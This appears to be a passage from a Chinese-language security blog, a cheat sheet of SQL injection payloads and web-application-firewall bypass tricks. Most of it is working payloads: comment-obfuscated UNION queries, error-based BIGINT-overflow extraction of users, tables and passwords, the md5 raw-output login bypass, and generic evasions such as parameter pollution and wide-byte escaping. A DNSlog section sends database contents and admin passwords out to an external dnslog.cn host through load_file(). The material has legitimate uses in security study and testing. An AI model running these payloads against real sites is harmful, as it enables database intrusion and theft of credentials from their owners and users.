<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#针对两个关键字连用或者函数</span><br><span class="line">&#x2F;*!&#x2F;*!50726union &#x2F;**&#x2F;&#x2F;**&#x2F;*&#x2F; select 1,2,3--+</span><br><span class="line">&#x2F;*!50726union*&#x2F;&#x2F;**&#x2F;&#x2F;*!50726select*&#x2F;1,2,3--+</span><br><span class="line">&#x2F;*!50726union&#x2F;**&#x2F;&#x2F;**&#x2F;*&#x2F; select 1,2,3--+</span><br><span class="line">&#x2F;*!union&#x2F;**&#x2F;&#x2F;**&#x2F;*&#x2F; select 1,2,3--+</span><br><span class="line">-1&#39; union&#x2F;*&#x2F;&#x2F;--**&#x2F;select 1,2,3--+</span><br><span class="line">-1&#39; union&#x2F;*&#x2F;!--**&#x2F;select 1,2,3--+</span><br><span class="line">id&#x3D;-1&#39; union&#x2F;*&#x2F;-*!!*&#x2F;select 1,2,3--+</span><br><span class="line">id&#x3D;-1&#39; union&#x2F;*&#x2F;&#x2F;--**&#x2F;&#x2F;*&#x2F;&#x2F;--**&#x2F;&#x2F;*&#x2F;!--**&#x2F;&#x2F;*&#x2F;-*!!*&#x2F;select 1,2,3--+</span><br><span class="line"></span><br><span class="line">#针对单独的一个关键字</span><br><span class="line">&#x2F;*!union&#x2F;*!&#x2F;*&#x2F;**&#x2F;*&#x2F;</span><br><span class="line">&#x2F;*!updatexml&#x2F;*!&#x2F;*&#x2F;**&#x2F;*&#x2F;</span><br><span class="line">&#x2F;*!extractvalue&#x2F;*!&#x2F;*&#x2F;**&#x2F;*&#x2F;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">Succuss示例：</span><br><span class="line">union A(B)  select 1,2,3</span><br><span class="line">union CA    select 1,2,3</span><br><span class="line">union CAA(B) select 1,2,3</span><br><span class="line">union A(B)CA select 1,2,3</span><br><span class="line">union CA(B) select 1,2,3</span><br><span class="line"></span><br><span class="line">Error：(与Succuss示例用法相同)</span><br><span class="line">A(DC) DDA &#x2F; DDA A(DC)</span><br><span class="line">A(DC) DA  &#x2F; DA A(DC)</span><br><span class="line">DDA</span><br><span class="line">DA A(B)   &#x2F; A(B) DA</span><br></pre></td></tr></table></figure>

<p><strong><code>语义欺骗</code></strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">阿里云waf挑战赛wp:</span><br><span class="line">mysql payload:</span><br><span class="line">'="/<span class="emphasis">*"=FIELD(if(substr((/*</span>/*/SelEct+table<span class="emphasis">_name+from&#123;a+%0dinformation_</span>schema%23%0a.%0atables&#125;+where+table_schema='test'+limit+0,1),1,1)='b',1,3),1,3)%23</span><br><span class="line"></span><br><span class="line">简写及伪代码:</span><br><span class="line">'="/<span class="emphasis">*"=FIELD(/*</span>/*/)%23</span><br><span class="line">正是语义分析错误，引擎误以为是 /<span class="emphasis">*"=FIELD(/*</span>/*/ ,从而放行</span><br><span class="line"></span><br><span class="line">POSTGRESQL payload:</span><br><span class="line">/<span class="emphasis">*'or+'0'!=position(substr((/*</span>a*/select+flag+from+flag_9740453557b698bee491c3fd9f2f3c69),1,1)+in+'0')+--+</span><br><span class="line"></span><br><span class="line">思路扩展:</span><br><span class="line">123'AND 1=len('/<span class="emphasis">*')/(seleCT -- *</span>/name from master..sysdatabases for xml path) --</span><br><span class="line"></span><br><span class="line">22329-len('/*')/@@version</span><br><span class="line"></span><br><span class="line">2-len('/*')/(case when substring(db_name(),1,1)='x' then 0 else 1 end)</span><br></pre></td></tr></table></figure>





<p><code>注释使用规则：</code><br><a href="https://blog.csdn.net/weixin_39781452/article/details/113324930" target="_blank" rel="noopener">图片来源</a><br><img src="https://s1.ax1x.com/2022/05/02/OP8ZEF.png" alt="avatar"></p>
<h3 id="绕过information-schema"><a href="#绕过information-schema" class="headerlink" title="绕过information_schema"></a>绕过information_schema</h3><p>当过滤or时，这个库就会被过滤，那么mysql在被waf禁掉了information_schema库后还能有哪些利用思路呢？</p>
<p>information_schema 简单来说，这个库在mysql中就是个信息数据库，它保存着mysql服务器所维护的所有其他数据库的信息，包括了数据库名，表名，字段名等。在注入中，infromation_schema库的作用无非就是可以获取到table_schema、table_name、column_name这些数据库内的信息。</p>
<p>能够代替information_schema的有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sys.schema_auto_increment_columns 只显示有自增的表</span><br><span class="line">sys.schema_table_statistics_with_buffer</span><br><span class="line">x$schema_table_statistics_with_buffer</span><br><span class="line">mysql.innodb_table_stats</span><br><span class="line">mysql.innodb_table_index</span><br></pre></td></tr></table></figure>

<p>示例：（一条完整的语句）</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">select * from user where id &#x3D; -1 </span><br><span class="line">union all select 1,2,3,group_concat(table_name)</span><br><span class="line">from sys.schema_table_statistics_with_buffer</span><br><span class="line"> where table_schema&#x3D;database();</span><br></pre></td></tr></table></figure>

<p>以上大部分特殊数据库都是在 <code>mysql5.0.7</code> 以后的版本才有，并且要访问sys数据库需要有相应的权限。</p>
<p><strong>利用报错注入从而无需information_schema (mysql 5.5.29版本)</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> SELECT <span class="emphasis">* FROM (SELECT *</span> FROM users A JOIN users B) C;</span><br><span class="line">——  Duplicate column name 'id'</span><br><span class="line"></span><br><span class="line">SELECT <span class="emphasis">* FROM (SELECT *</span> FROM users A JOIN users B USING (id)) C;</span><br><span class="line">—— Duplicate column name 'username'</span><br><span class="line"></span><br><span class="line">SELECT <span class="emphasis">* FROM (SELECT *</span> FROM users A JOIN users B USING (id,username)) C;</span><br><span class="line">—— Duplicate column name 'password'</span><br><span class="line"></span><br><span class="line">SELECT <span class="emphasis">* FROM (SELECT *</span> FROM users A JOIN users B USING (id,username,password)) C;</span><br><span class="line">—— 数据出来</span><br></pre></td></tr></table></figure>





<p>但是在使用上面的后两个表来获取表名之后select group_concat(table_name) from mysql.innodb_table_stats，<br>我们是没有办法获得列的，这个时候就要采用无列名注入的办法：</p>
<h3 id="无列名注入：-建议看原文-提供了各式各样的脚本，可自行魔改"><a href="#无列名注入：-建议看原文-提供了各式各样的脚本，可自行魔改" class="headerlink" title="无列名注入：(建议看原文)[提供了各式各样的脚本，可自行魔改]"></a>无列名注入：(建议看<a href="https://xz.aliyun.com/t/10594#toc-6" target="_blank" rel="noopener">原文</a>)[提供了各式各样的脚本，可自行魔改]</h3><p>示例语句：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">select 1,2,3;</span><br><span class="line">select 1,2,3 union select * from users;</span><br></pre></td></tr></table></figure>

<p>在我们直接<code>select 1,2,3</code>时，会创建一个虚拟的表：<br><img src="https://s1.ax1x.com/2022/05/10/ONOWvQ.png" alt="avatar"><br>如图所见列名会被定义为1，2，3</p>
<p>当我们结合了union联合查询之后<br><img src="https://s1.ax1x.com/2022/05/10/ONORgg.png" alt="avatar"><br>如图，我们的列名被替换为了对应的数字。也就是说，我们可以继续数字来对应列，如 3 对应了表里面的 password，进而我们就可以构造这样的查询语句来查询password：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select &#96;3&#96; from (select 1,2,3 union select * from users)a;</span><br></pre></td></tr></table></figure>

<p><img src="https://s1.ax1x.com/2022/05/10/ONO4Ds.png" alt="avatar"><br>末尾的 a 可以是任意字符，用于命名</p>
<p>当然，多数情况下，反引号会被过滤。当反引号不能使用的时候，可以使用别名来代替：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select b from (select 1,2,3 as b union select * from admin)a;</span><br></pre></td></tr></table></figure>

<p><code>join：</code><br>我们可以利用爆错，借助join和using爆出列名，id为第一列，username为第二列，可以逐个爆出，爆出全部列名之后即可得到列内数据。</p>
<p><img src="https://s1.ax1x.com/2022/05/10/ONOhuj.png" alt="avatar"></p>
<p><code>union被过滤情况下：</code> <a href="https://www.baidu.com/link?url=aexRXQ822IapdnQ2j3zaqb525hILYlxINwIJqTluamKP1ZT855vMSS8SrcmQRDpih0oacUgG-RrH-z-Wcab_URZ7RF6wWAfUG6u5kjU3oGy&wd=&eqid=d1bc3a6d000096b40000000662904078" target="_blank" rel="noopener">文章指路</a><br>比较查询的字符串，若字符串长度不同它会比较首位<br><img src="https://img-blog.csdnimg.cn/305162614d7e463997ca10891e59fb20.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="avatar"></p>
<p><img src="https://img-blog.csdnimg.cn/d1d07aa0344f4900ac6c139dce6e8e54.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="avatar"></p>
<p><img src="https://img-blog.csdnimg.cn/edd957feac3440e6a96f1443d5b4346b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAc3VjYzM=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="abatar"></p>
<h3 id="False注入：-建议看原文"><a href="#False注入：-建议看原文" class="headerlink" title="False注入：(建议看原文)"></a>False注入：(建议看<a href="https://xz.aliyun.com/t/10594#toc-6" target="_blank" rel="noopener">原文</a>)</h3><p>目的是绕过引号构造出0这个值：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from user where username &#x3D;&#39;.$username.&#39;;</span><br></pre></td></tr></table></figure>

<p>直接贴payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">插入&#39;+&#39;, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;+&#39;&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;-&#39;, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;-&#39;&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;*&#39;, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;*&#39;&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;&#x2F;6#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;&#x2F;6#&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;%1#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;%1#&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;&amp;0#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;&amp;0#&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;|0#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;|0#&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;^0#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;^0#&#39;;</span><br><span class="line"></span><br><span class="line">插入&#39;&lt;&lt;0# 或 &#39;&gt;&gt;0#, 拼接的语句: </span><br><span class="line">select * from user where username &#x3D;&#39;&#39;&lt;&lt;0#&#39;;</span><br><span class="line">select * from user where username &#x3D;&#39;&#39;&gt;&gt;0#&#39;;</span><br><span class="line"></span><br><span class="line">&#39;&#x3D;0&lt;&#x3D;&gt;1# 拼接的语句：</span><br><span class="line">where username&#x3D;&#39;&#39;&#x3D;0&lt;&#x3D;&gt;1#&#39;</span><br><span class="line"></span><br><span class="line">&#39;&#x3D;0&lt;&gt;0# 拼接的语句：</span><br><span class="line">where username&#x3D;&#39;&#39;&#x3D;0&lt;&gt;0#&#39;</span><br><span class="line"></span><br><span class="line">&#39;&gt;-1# 拼接的语句：</span><br><span class="line">where username&#x3D;&#39;&#39;&gt;-1#</span><br><span class="line"></span><br><span class="line">其他：</span><br><span class="line">&#39;+1 is not null#  &#39;in(-1,1)#  &#39;not in(1,0)#  &#39;like 1#  &#39;REGEXP 1#  &#39;BETWEEN 1 AND 1#  &#39;div 1#  &#39;xor 1#  &#39;&#x3D;round(0,1)&#x3D;&#39;1  &#39;&lt;&gt;ifnull(1,2)&#x3D;&#39;1</span><br></pre></td></tr></table></figure>

<p><code>CTF经典例题：&#39;&quot;.md5($pass,true).&quot;&#39; 登录绕过</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT * FROM users WHERE password &#x3D; &#39;.md5($password,true).&#39;;</span><br></pre></td></tr></table></figure>

<p>md5(string,true) 函数在指定了true的时候，是返回的原始 16 字符二进制格式<br>想办法让输入的payload转换为16进制后拼接成永真即可。<br>绕过：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ffifdyop</span><br><span class="line">129581926211651571912466741651878684928</span><br></pre></td></tr></table></figure>

<h3 id="DNS注入"><a href="#DNS注入" class="headerlink" title="DNS注入"></a>DNS注入</h3><p>原理：<br>通过子查询，将内容拼接到域名内，让load_file()去访问共享文件，访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件，通过拼接出函数做查询,拼接到域名中，访问时将访问服务器，记录后查看日志。</p>
<p>在无法直接利用的情况下，但是可以通过DNS请求,通过DNSlog，把数据外带，用DNS解析记录查看。</p>
<p>LOAD_FILE()： 读取文件的函数<br>条件：<br>文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认1MB）。 如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。<br>secure_file_priv=</p>
<p><code>DNSLOG平台：</code><br><a href="https://dns.xn--9tr.com/" target="_blank" rel="noopener">https://dns.xn–9tr.com/</a><br><a href="https://log.xn--9tr.com/" target="_blank" rel="noopener">https://log.xn–9tr.com/</a></p>
<p><code>UNC路径：</code><br>UNC路径通用命名规则，也称通用命名规范、通用命名约定，类似\softer这样的形式的网络路径。</p>
<p>UNC路径的 格式 ：\server\sharename\directory\filename</p>
<p>等同于SELECT LOAD_FILE(‘//库名.1806dl.dnslog.cn/abc’</p>
<p>去访问 库名.1806dl.dnslog.cn 的服务器下的共享文件夹abc。</p>
<p>然后1806dl.dnslog.cn的子域名的解析都是在某台服务器，然后他记录下来了有人请求访问了error.1806dl.dnslog.cn，然后在DnsLog这个平台上面显示出来了</p>
<p>payload示例：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">?id&#x3D;1 and load_file(concat(&#39;&#x2F;&#x2F;&#39;, database(),&#39;.htleyd.dnslog.cn&#x2F;abc&#39;))</span><br><span class="line"></span><br><span class="line">?id&#x3D;1 and load_file(concat(&#39;&#x2F;&#x2F;&#39;, (select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1 ),&#39;.htleyd.dnslog.cn&#x2F;abc&#39;))</span><br><span class="line"></span><br><span class="line">?id&#x3D;1 and load_file(concat(&#39;&#x2F;&#x2F;&#39;,(select column_name from information_schema.columns where table_name&#x3D;’admin’ and table_schema&#x3D;database() limit 2,1),&#39;.htleyd.dnslog.cn&#x2F;abc&#39;))</span><br><span class="line"></span><br><span class="line">?id&#x3D;1 and load_file(concat(&#39;&#x2F;&#x2F;&#39;,(select password from admin limit 0,1),&#39;.htleyd.dnslog.cn&#x2F;abc&#39;))</span><br></pre></td></tr></table></figure>



<h3 id="基于BIGINT溢出错误的SQL注入"><a href="#基于BIGINT溢出错误的SQL注入" class="headerlink" title="基于BIGINT溢出错误的SQL注入"></a><a href="https://www.cnblogs.com/lcamry/articles/5509112.html" target="_blank" rel="noopener">基于BIGINT溢出错误的SQL注入</a></h3><p><strong>所需Mysql版本:5.5.29版本可以，5.7.26版本不可以</strong></p>
<figure class="highlight md"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">a. 获取user():</span><br><span class="line">select ~0+!(select*from(select user())x);</span><br><span class="line"></span><br><span class="line">变种:</span><br><span class="line">!(select*from(select user())x)-~0</span><br><span class="line"></span><br><span class="line">(select(!x-~0)from(select(select user())x)a)</span><br><span class="line"></span><br><span class="line">(select!x-~0.from(select(select user())x)a)</span><br><span class="line"></span><br><span class="line">b. 使用Mysql中所有数学函数进行构造</span><br><span class="line">select !atan((select*from(select user())a))-~0; </span><br><span class="line">select !ceil((select*from(select user())a))-~0;</span><br><span class="line">select !floor((select*from(select user())a))-~0;</span><br><span class="line"></span><br><span class="line">下面的我们已经测试过了,还可以找更多!</span><br><span class="line">一行4个:</span><br><span class="line">HEX		IN			FLOOR		CEIL</span><br><span class="line">RAND	CEILING		TRUNCATE	TAN</span><br><span class="line">SQRT	ROUND		SIGN</span><br><span class="line"></span><br><span class="line">c. 基本流程:</span><br><span class="line">爆表:</span><br><span class="line">!(select*from(select table<span class="emphasis">_name from information_</span>schema.tables where table_schema=database() limit 0,1)x)-~0</span><br><span class="line"></span><br><span class="line">爆列:</span><br><span class="line">select !(select*from(select column<span class="emphasis">_name from information_</span>schema.columns where table_name='users' limit 0,1)x)-~0;</span><br><span class="line"></span><br><span class="line">检索数据:</span><br><span class="line">select !(select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)-~0;</span><br><span class="line"></span><br><span class="line">d. 利用插入语句注入</span><br><span class="line">insert into users (id, username, password) values (2, '' or !(select*from(select user())x)-~0 or '', 'Eyre');</span><br><span class="line"></span><br><span class="line">e. dios查询:</span><br><span class="line">insert into users (id, username, password) values (2, '' or !(select<span class="emphasis">*from(select(concat(@:=0,(select count(*</span>)from<span class="code">`information_schema`</span>.columns where table<span class="emphasis">_schema=database()and@:=concat(@,0xa,table_</span>schema,0x3a3a,table<span class="emphasis">_name,0x3a3a,column_</span>name)),@)))x)-~0 or '', 'Eyre');</span><br><span class="line"></span><br><span class="line">f. 利用更新语句:</span><br><span class="line">update users set password='Peter' or !(select*from(select user())x)-~0 or '' where id=4;</span><br><span class="line"></span><br><span class="line">1' or !(select*from(select user())x)-~0 or '';</span><br></pre></td></tr></table></figure>





<h1 id="通用Bypass手段-老树"><a href="#通用Bypass手段-老树" class="headerlink" title="通用Bypass手段(老树)"></a>通用Bypass手段(老树)</h1><h3 id="请求方式差异规则松懈性绕过"><a href="#请求方式差异规则松懈性绕过" class="headerlink" title="请求方式差异规则松懈性绕过:"></a><strong>请求方式差异规则松懈性绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">有些WAF同时接收GET方法和POST的方法，但只在GET方法中增加了过滤规则，可通过发送POST方法进行绕过</span><br></pre></td></tr></table></figure>

<h3 id="异常-多种Method绕过"><a href="#异常-多种Method绕过" class="headerlink" title="异常/多种Method绕过:"></a><strong>异常/多种Method绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">有些WAF只检测GET，POST方法，可通过使用异常方法进行绕过.</span><br><span class="line"></span><br><span class="line">比如:   </span><br><span class="line">正常payload:   GET &#x2F;xxx&#x2F;?id&#x3D;1+and+sleep(3) HTTP&#x2F;1.1</span><br><span class="line">绕过payload:   TonyD0g &#x2F;xxx&#x2F;?id&#x3D;1+and+sleep(3)HTTP&#x2F;1.1</span><br><span class="line">               PUT &#x2F;xxx&#x2F;?id&#x3D;1+and+sleep(3)HTTP&#x2F;1.1</span><br></pre></td></tr></table></figure>

<h3 id="脏数据绕过"><a href="#脏数据绕过" class="headerlink" title="脏数据绕过:"></a><strong>脏数据绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">部分WAF只检测固定大小的内容，可通过添加无用字符进行绕过检测.</span><br><span class="line">(也可能因为性能的原因)</span><br><span class="line">添加无用字符，使内容大小超过WAF检测能检测到的最大内容.</span><br><span class="line"></span><br><span class="line">比如:   </span><br><span class="line">正常payload:   ?id&#x3D;1+and+sleep(3) </span><br><span class="line"></span><br><span class="line">绕过payload:   ?id&#x3D;1+and+sleep(3)+and+111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111</span><br><span class="line">               111111&#x3D;11111111111111111111111111</span><br></pre></td></tr></table></figure>

<h3 id="参数污染HPP"><a href="#参数污染HPP" class="headerlink" title="参数污染HPP:"></a><strong>参数污染HPP</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">在提交的URL中给一个参数多次赋了不同的值(?id&#x3D;1&amp;id&#x3D;2)，部分WAF在处理的过程中可能只处理前面提交的参数值(id&#x3D;1)，</span><br><span class="line">而后端程序在处理的时候可能取的是最后面的值。</span><br><span class="line"></span><br><span class="line">**(将攻击语句赋予最后一个id参数，可绕过WAF检测直接进入后端服务器)**</span><br><span class="line"></span><br><span class="line">比如:</span><br><span class="line">正常payload:    ?id&#x3D;1+and+sleep(3) </span><br><span class="line"></span><br><span class="line">绕过payload:    ?id&#x3D;1&amp;id&#x3D;2+and+sleep(3) </span><br><span class="line"></span><br><span class="line">不同的平台	                解析结果	                例如(其中Par1 &#x3D;&#x3D;&gt; parameter1 , val1 &#x3D;&#x3D;&gt; value1)</span><br><span class="line">-----------------------------------------------------------------------------</span><br><span class="line">ASP.NET&#x2F;IIS	            所有出现的指定参数	            Par1&#x3D;val1,val2</span><br><span class="line">ASP&#x2F;IIS	                    所有出现的指定参数	            Par1&#x3D;val1,val2</span><br><span class="line">AXIS 2400	            所有出现的指定参数	            Par1&#x3D;val1,val2</span><br><span class="line">DBMan	                    所有出现的指定参数	            Par1&#x3D;val1~~val2</span><br><span class="line">Jsp,Servlet&#x2F;Apache Tomcat	第一个参数	            Par1&#x3D;val1</span><br><span class="line">Jsp,Servlet&#x2F;Jetty	        第一个参数	            Par1&#x3D;val1</span><br><span class="line">IBM HTTP Server	                第一个参数	            Par1&#x3D;val1</span><br><span class="line">Perl CGI&#x2F;Apache	                第一个参数	            Par1&#x3D;val1</span><br><span class="line">mod_wsgi(Python)&#x2F;Apache	        第一个参数	            Par1&#x3D;val1</span><br><span class="line">mod_perl,libapreq2&#x2F;Apache	第一个参数	            Par1&#x3D;val1</span><br><span class="line">PHP&#x2F;Apache	                最后一个参数	            Par1&#x3D;val2</span><br><span class="line">PHP&#x2F;Zeus	                最后一个参数	            Par1&#x3D;val2</span><br><span class="line">Ricoh Aficio 1022 Printer	第一个参数	            Par1&#x3D;val1</span><br><span class="line">webcamXP PRO	                第一个参数	            Par1&#x3D;val1</span><br><span class="line">Jsp,Servlet&#x2F;Oracle AS 10G	第一个参数	            Par1&#x3D;val1</span><br><span class="line">IBM Lotus Domino	        最后一个参数	            Par1&#x3D;val2</span><br><span class="line">IceWarp	                        最后一个参数	            Par1&#x3D;val2</span><br><span class="line">Linksys Wireless-G PTZ	        最后一个参数	            Par1&#x3D;val2</span><br><span class="line">mod_perl,lib???&#x2F;Apache	        变成一个数组	            ARRAY(0x8b9059c)</span><br><span class="line">Python&#x2F;Zope	                变成一个数组	            [‘val1’,‘val2’]</span><br><span class="line">-----------------------------------------------------------------------------</span><br></pre></td></tr></table></figure>

<h3 id="协议未覆盖绕过"><a href="#协议未覆盖绕过" class="headerlink" title="协议未覆盖绕过:"></a><strong>协议未覆盖绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">部分WAF可能只对一种content-type类型增加了检测规则，可以尝试互相替换尝试去绕过WAF过滤机制.</span><br><span class="line"></span><br><span class="line">以下四种常见的content-type类型:</span><br><span class="line"></span><br><span class="line">Content-Type:multipart&#x2F;form-data;</span><br><span class="line">Content-Type:application&#x2F;x-www-form-urlencoded</span><br><span class="line">Content-Type: text&#x2F;xml</span><br><span class="line">Content-Type: application&#x2F;json</span><br></pre></td></tr></table></figure>

<h3 id="宽字节绕过"><a href="#宽字节绕过" class="headerlink" title="宽字节绕过:"></a><strong>宽字节绕过</strong>:</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">宽字节注入是因为使用了GBK编码。</span><br><span class="line">为了防止sql注入，提交的单引号(%27)会进行转义处理，即在单引号前加上斜杠(%5C%27)</span><br><span class="line"></span><br><span class="line">比如:</span><br><span class="line">正常payload:    ?id&#x3D;1&#39;and 1&#x3D;1--+ </span><br><span class="line"></span><br><span class="line">绕过payload:    ?id&#x3D;1%df%27and 1&#x3D;1--+</span><br><span class="line"></span><br><span class="line">问题在于 %df%27 经过转义后会变成 %df%5C%27 ,其中 %df%5c 会被识别为一个新的字节，而 %27 则被当做单引号，成功实现了语句闭合。</span><br></pre></td></tr></table></figure>

